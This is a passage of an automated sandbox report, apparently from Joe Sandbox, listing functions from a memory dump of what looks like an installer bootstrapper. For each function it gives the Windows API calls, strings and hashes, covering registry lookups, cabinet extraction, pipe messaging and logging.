Opcode Fuzzy Hash: 3ca5385e20e4da900889f67cd77ac5c417ea279a1a95a3d72042c5521b849dda
Instruction Fuzzy Hash: 1431A531A40619FFCB08DFA9DC8499AB7A9FF04764B048229F919F7650D730AD10CBD0

Function 00E84212 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E84315: FindFirstFileW.KERNELBASE(?,?,00000000,00000000,?), ref: 00E84350
Part of subcall function 00E84315: FindClose.KERNEL32(00000000), ref: 00E8435C

RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll), ref: 00E84305

Part of subcall function 00E80E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,00E85699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 00E80E52

Part of subcall function 00E810C5: RegQueryValueExW.KERNELBASE(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 00E810ED
Part of subcall function 00E810C5: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,?,?,?,?,00E56EF3,00000100,000000B0,00000088,00000410,000002C0), ref: 00E81126

Strings

\, xrefs: 00E8428E
PendingFileRenameOperations, xrefs: 00E84270
crypt32.dll, xrefs: 00E8423D
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00E84244

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CloseFindQueryValue$FileFirstOpen
String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
API String ID: 3397690329-3978359083
Opcode ID: 3bfb5a3d6fd54eec8c6a9c346b8bf7b1769e095a2809be9af08d85dbee0e14c9
Instruction ID: e2ceeb1c665555b3e29e7d190a1db64d5cb355fe48dded0e6772d7ca03718d9d
Opcode Fuzzy Hash: 3bfb5a3d6fd54eec8c6a9c346b8bf7b1769e095a2809be9af08d85dbee0e14c9
Instruction Fuzzy Hash: 5131E2B5D0421AEBDF21BFC1CC419AEB7B9EF00358F5491AAF90CB61A2D3319A40CB54

Function 00E68B73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E80E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,00E85699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 00E80E52

CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 00E68BF7
RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,00E4F66B,00000001,00000100,000001B4,00000000), ref: 00E68C45

Strings

Failed to enumerate uninstall key for related bundles., xrefs: 00E68C56
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00E68B94
Failed to open uninstall registry key., xrefs: 00E68BBA

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CloseCompareOpenString
String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 2817536665-2531018330
Opcode ID: b70f7270800dda2b1be6a7b726967482cae14a50234c349c04cc86ca317d026c
Instruction ID: 3ef2c4ec0ec8ebcdac30d83c24b24e12775d939a710b3c1dc3adca639f0da77f
Opcode Fuzzy Hash: b70f7270800dda2b1be6a7b726967482cae14a50234c349c04cc86ca317d026c
Instruction Fuzzy Hash: 5421E736941118FFDF25ABA0DD45FAEFA79EB007A4F245364F414760A0CB754E90D790

Function 00E831C7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E831DD
SysAllocString.OLEAUT32(?), ref: 00E831F9
VariantClear.OLEAUT32(?), ref: 00E83280
SysFreeString.OLEAUT32(00000000), ref: 00E8328B

Strings

xmlutil.cpp, xrefs: 00E83210

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: xmlutil.cpp
API String ID: 760788290-1270936966
Opcode ID: a51a9449cfba99c3682d7564b1d891930f281c012036284f16caf4a4022fb288
Instruction ID: f2fdde49f0c7bcc723160d694eb8c5d0ef35afbfb636e90f184e562de7356907
Opcode Fuzzy Hash: a51a9449cfba99c3682d7564b1d891930f281c012036284f16caf4a4022fb288
Instruction Fuzzy Hash: 73218635901219EFCB14EBB8C848EAEBBB9AF44B15F154158F90DBB230DB319E05CB90

Function 00E44013 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00000003,00000001,00000000,00000000,?,00E8416C,00000001,00000000,?,00E84203,00000003,00000001,00000001,00000000,00000000,00000000), ref: 00E44021
GetLastError.KERNEL32(?,00E8416C,00000001,00000000,?,00E84203,00000003,00000001,00000001,00000000,00000000,00000000,?,00E5A55D,?,00000000), ref: 00E4402F
CreateDirectoryW.KERNEL32(00000003,00000001,00000001,?,00E8416C,00000001,00000000,?,00E84203,00000003,00000001,00000001,00000000,00000000,00000000), ref: 00E44097
GetLastError.KERNEL32(?,00E8416C,00000001,00000000,?,00E84203,00000003,00000001,00000001,00000000,00000000,00000000,?,00E5A55D,?,00000000), ref: 00E440A1

Strings

dirutil.cpp, xrefs: 00E440CF

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: dirutil.cpp
API String ID: 1375471231-2193988115
Opcode ID: 4331b6bc7f16568aebd1e02e40e8e3cdae775dd3a1dc0a531bb778c6ba522b25
Instruction ID: fa1166f3f013434ea62e395587e46aacad63d46d0b6ec6b25b370881826d0245
Opcode Fuzzy Hash: 4331b6bc7f16568aebd1e02e40e8e3cdae775dd3a1dc0a531bb778c6ba522b25
Instruction Fuzzy Hash: CA11E4B6700321EAEB312AA26C44B7BB694DF50B64F115125FF49FB0D0DB658C25A2E2

Function 00E54880 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,?,00E551A4), ref: 00E548CC

Strings

Failed to write message type to pipe., xrefs: 00E5490E
pipe.cpp, xrefs: 00E54904
Failed to allocate message to write., xrefs: 00E548AB

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: FileWrite
String ID: Failed to allocate message to write.$Failed to write message type to pipe.$pipe.cpp
API String ID: 3934441357-1996674626
Opcode ID: 16b3495fefc2ad36bde2127635ba53f4a1c24cf59d641f1ebea02be1e52108b7
Instruction ID: 3cd02219e175537f8e22ef9bf161d2e6339c5bb99383bf44ac0dc613bf709f29
Opcode Fuzzy Hash: 16b3495fefc2ad36bde2127635ba53f4a1c24cf59d641f1ebea02be1e52108b7
Instruction Fuzzy Hash: BF119AB2A00219BEDB21DFA5ED09ADF7BF9EB84351F111166FC04B2190D7709E94D6A0

Function 00E5444C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00E438D4: GetProcessHeap.KERNEL32(?,000001C7,?,00E42284,000001C7,00000001,80004005,8007139F,?,?,00E8015F,8007139F,?,00000000,00000000,8007139F), ref: 00E438E5
Part of subcall function 00E438D4: RtlAllocateHeap.NTDLL(00000000,?,00E42284,000001C7,00000001,80004005,8007139F,?,?,00E8015F,8007139F,?,00000000,00000000,8007139F), ref: 00E438EC

_memcpy_s.LIBCMT ref: 00E5449E
_memcpy_s.LIBCMT ref: 00E544B1
_memcpy_s.LIBCMT ref: 00E544CC

Strings

Failed to allocate memory for message., xrefs: 00E54487
pipe.cpp, xrefs: 00E5447D

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: _memcpy_s$Heap$AllocateProcess
String ID: Failed to allocate memory for message.$pipe.cpp
API String ID: 886498622-1914209504
Opcode ID: 6c1a4900c2c988e65fafc5fb75e267fb9afe75025c8eff2689f2641f536a16e7
Instruction ID: 07528ed4036fae8ae15865a9d7a1355c8da1cc8489746baf97812f2da6667596
Opcode Fuzzy Hash: 6c1a4900c2c988e65fafc5fb75e267fb9afe75025c8eff2689f2641f536a16e7
Instruction Fuzzy Hash: 521191F664030DABDB01EE90DC86DDBB3ACEF04754B04542AFA14AB141E7B0DA54C7E1

Function 00E83B4A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00E83B98
GetLastError.KERNEL32(?,?,00000000), ref: 00E83BA2
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00E83BD5

Strings

shelutil.cpp, xrefs: 00E83BC3
<, xrefs: 00E83B8A

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CloseErrorExecuteHandleLastShell
String ID: <$shelutil.cpp
API String ID: 3023784893-3991740012
Opcode ID: 3a4a6d76a5d3f1cf5c57d74df1f135f8bf80e4bb88e29a44086f880b3957a5a5
Instruction ID: 83fe2098d5a225d6f105ed2909806422f8c7048f6e253201db770fbb9e5ad864
Opcode Fuzzy Hash: 3a4a6d76a5d3f1cf5c57d74df1f135f8bf80e4bb88e29a44086f880b3957a5a5
Instruction Fuzzy Hash: 2B11D6B5E01219AFDB10DFA9D844ACEBBF8AB08751F00412AFD09F7250E7349E008BA4

Function 00E688CF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E80E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,00E85699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 00E80E52

RegCloseKey.KERNELBASE(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,00E68C14,00000000,00000000), ref: 00E6898C

Strings

Failed to ensure there is space for related bundles., xrefs: 00E6893F
Failed to open uninstall key for potential related bundle: %ls, xrefs: 00E688FB
Failed to initialize package from related bundle id: %ls, xrefs: 00E68972

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
API String ID: 47109696-1717420724
Opcode ID: afdcaec722d47030f1e9fd2e9b4d0fee8f173b322cc826376da5959c9d8f4cdc
Instruction ID: c98d48a33e5d6d7f3d9c7cd4a9550db3985b5c1ebe6adc2f03f65d68bdc498ff
Opcode Fuzzy Hash: afdcaec722d47030f1e9fd2e9b4d0fee8f173b322cc826376da5959c9d8f4cdc
Instruction Fuzzy Hash: 6E21A432980219FFDF129E90DE05BFEBB78EB44750F146255F90876160DB319D20E791

Function 00E53955 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E80E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,00E85699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 00E80E52

RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00E53E61,feclient.dll,?,00000000,?,?,?,00E44A0C), ref: 00E539F1

Part of subcall function 00E80F6E: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,?), ref: 00E80FE4
Part of subcall function 00E80F6E: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00E8101F

Strings

SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 00E53966
Logging, xrefs: 00E53983
feclient.dll, xrefs: 00E5395A

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
API String ID: 1586453840-3596319545
Opcode ID: 0ed60e8eaee5121823b8cb3320f8cf73840b91d7af46ef499284f9acd7d76987
Instruction ID: 27c2f04b1072286c008335df2224a61997e8c8fda399b43178d7b7ed884c915d
Opcode Fuzzy Hash: 0ed60e8eaee5121823b8cb3320f8cf73840b91d7af46ef499284f9acd7d76987
Instruction Fuzzy Hash: 2911E9B3B4020CBBDB219AB5CC429AEB7B8EB80787F505866EA05B7054D6B15F85D710

Function 00E80658 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,?,00E7FF0B,?,?,00000000,00000000,0000FDE9), ref: 00E8066A
WriteFile.KERNELBASE(0000008C,00000000,00000000,00000000,00000000,?,?,00E7FF0B,?,?,00000000,00000000,0000FDE9), ref: 00E806A6
GetLastError.KERNEL32(?,?,00E7FF0B,?,?,00000000,00000000,0000FDE9), ref: 00E806B0

Strings

logutil.cpp, xrefs: 00E806E0

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorFileLastWritelstrlen
String ID: logutil.cpp
API String ID: 606256338-3545173039
Opcode ID: 815b78ee1d3f213bf53a0ddb4c5507c646b1f5d42b78a976420e077063041773
Instruction ID: 5dcd22ce4436c05b09e8f9d131a3b5792f2b05eb67c7a4d8d86486bc02a3e867
Opcode Fuzzy Hash: 815b78ee1d3f213bf53a0ddb4c5507c646b1f5d42b78a976420e077063041773
Instruction Fuzzy Hash: 3D110632A01725AF9310AA768C44EAFBBACEBC5760B101215FD0DF7540E730AD14D7E0

Function 00E6074E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E6114F: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00E6077D,?,?,?), ref: 00E61177
Part of subcall function 00E6114F: GetLastError.KERNEL32(?,00E6077D,?,?,?), ref: 00E61181

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00E6078B
GetLastError.KERNEL32 ref: 00E60795

Strings

cabextract.cpp, xrefs: 00E607B9
Failed to read during cabinet extraction., xrefs: 00E607C3

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID: Failed to read during cabinet extraction.$cabextract.cpp
API String ID: 2170121939-2426083571
Opcode ID: 6f829f03d9fb1153d6a54922c2bab1911e28c1bd13fa9796e6d76e046ace670e
Instruction ID: 283c0f37e0a4655d61bcbaa7add0c28afad1cd0f1a7db673fbb6fbf2fb2d10e6
Opcode Fuzzy Hash: 6f829f03d9fb1153d6a54922c2bab1911e28c1bd13fa9796e6d76e046ace670e
Instruction Fuzzy Hash: 94018272601724AFDB109FA9DC05E9A7BE9FF09760F010129FD08E7550D7319A1097D0

Function 00E6114F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00E6077D,?,?,?), ref: 00E61177
GetLastError.KERNEL32(?,00E6077D,?,?,?), ref: 00E61181

Strings

Failed to move to virtual file pointer., xrefs: 00E611AF
cabextract.cpp, xrefs: 00E611A5

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move to virtual file pointer.$cabextract.cpp
API String ID: 2976181284-3005670968
Opcode ID: 2b194f87809ca00058b1b44f55c6ab1c121cb890969ebdb893ecf7956e56634f
Instruction ID: 73a34fb5e70396e0d94d0cbff7822bd25b31bb178bd6fc1e68dab2be85e86a16
Opcode Fuzzy Hash: 2b194f87809ca00058b1b44f55c6ab1c121cb890969ebdb893ecf7956e56634f
Instruction Fuzzy Hash: E901F232641735BBDB221AA6AC08E87BFA9EF017B0B049126FD0CB6110D7258C10C7D0

Function 00E5F086 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 00E5F09B
GetLastError.KERNEL32 ref: 00E5F0A5

Strings

Failed to post plan message., xrefs: 00E5F0D3
userForApplication.cpp, xrefs: 00E5F0C9

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post plan message.
API String ID: 2609174426-2952114608
Opcode ID: 7260ad3f54ac5b7f8dd181e85b7ca2643d80dd896e6564b3d5001a0321fb82de
Instruction ID: cf2746249deb432c7230311b8c5f529aef0bca36273dea89b23196c4892a8283
Opcode Fuzzy Hash: 7260ad3f54ac5b7f8dd181e85b7ca2643d80dd896e6564b3d5001a0321fb82de
Instruction Fuzzy Hash: D6F06C327553307FE771666A5C49E877BC8DF04BA1F015025FD0CF7192D6558C0496E5

Function 00E6051A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?,00E6145A,00000000,00000000,?,00E4C121,00000000,?,?,00E6AB88,?,00000000,?,?), ref: 00E60524
GetLastError.KERNEL32(?,00E6145A,00000000,00000000,?,00E4C121,00000000,?,?,00E6AB88,?,00000000,?,?,?,00000000), ref: 00E6052E

Strings

Failed to set begin operation event., xrefs: 00E6055C
cabextract.cpp, xrefs: 00E60552

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorEventLast
String ID: Failed to set begin operation event.$cabextract.cpp
API String ID: 3848097054-4159625223
Opcode ID: 31e4d85a60552d904438680f51c3e91fd5ec99cf654c849aebf225cfd541ecc8
Instruction ID: aa4587806ff60aecadd22a884a6d40580fd454728d0fb99fa7ada9914d9bb72e
Opcode Fuzzy Hash: 31e4d85a60552d904438680f51c3e91fd5ec99cf654c849aebf225cfd541ecc8
Instruction Fuzzy Hash: 27F0A033A517306AAB21A6BABC0AA9B76D8DF047A1B012136FD09F7160E6149D0057E9

Function 00E5E978 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 00E5E98D
GetLastError.KERNEL32 ref: 00E5E997

Strings

userForApplication.cpp, xrefs: 00E5E9BB
Failed to post apply message., xrefs: 00E5E9C5

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post apply message.
API String ID: 2609174426-1304321051
Opcode ID: b94a3e31c840cc52c35735cabc59254ea2815bc152dcfcdc81448789e6ee2430
Instruction ID: d4fe3b3a6bbb2a590b8d0fc32817881ff8958581daebca95337e04d6a8b16c5a
Opcode Fuzzy Hash: b94a3e31c840cc52c35735cabc59254ea2815bc152dcfcdc81448789e6ee2430
Instruction Fuzzy Hash: 00F06C327413306FE721766AAC49E877BC8DF04BA1F015026FD0CF6192D6658D1497E5

Function 00E5EA09 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 00E5EA1E
GetLastError.KERNEL32 ref: 00E5EA28

Strings

Failed to post detect message., xrefs: 00E5EA56
userForApplication.cpp, xrefs: 00E5EA4C

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post detect message.
API String ID: 2609174426-598219917
Opcode ID: 58d3957811a17cfc030846c314b28d14fa32ae01582540f72e1e7573ad931e9b
Instruction ID: 7b714cebbe862f375ce572d247f222a51a0c5ed7187897748444c678848d809b
Opcode Fuzzy Hash: 58d3957811a17cfc030846c314b28d14fa32ae01582540f72e1e7573ad931e9b
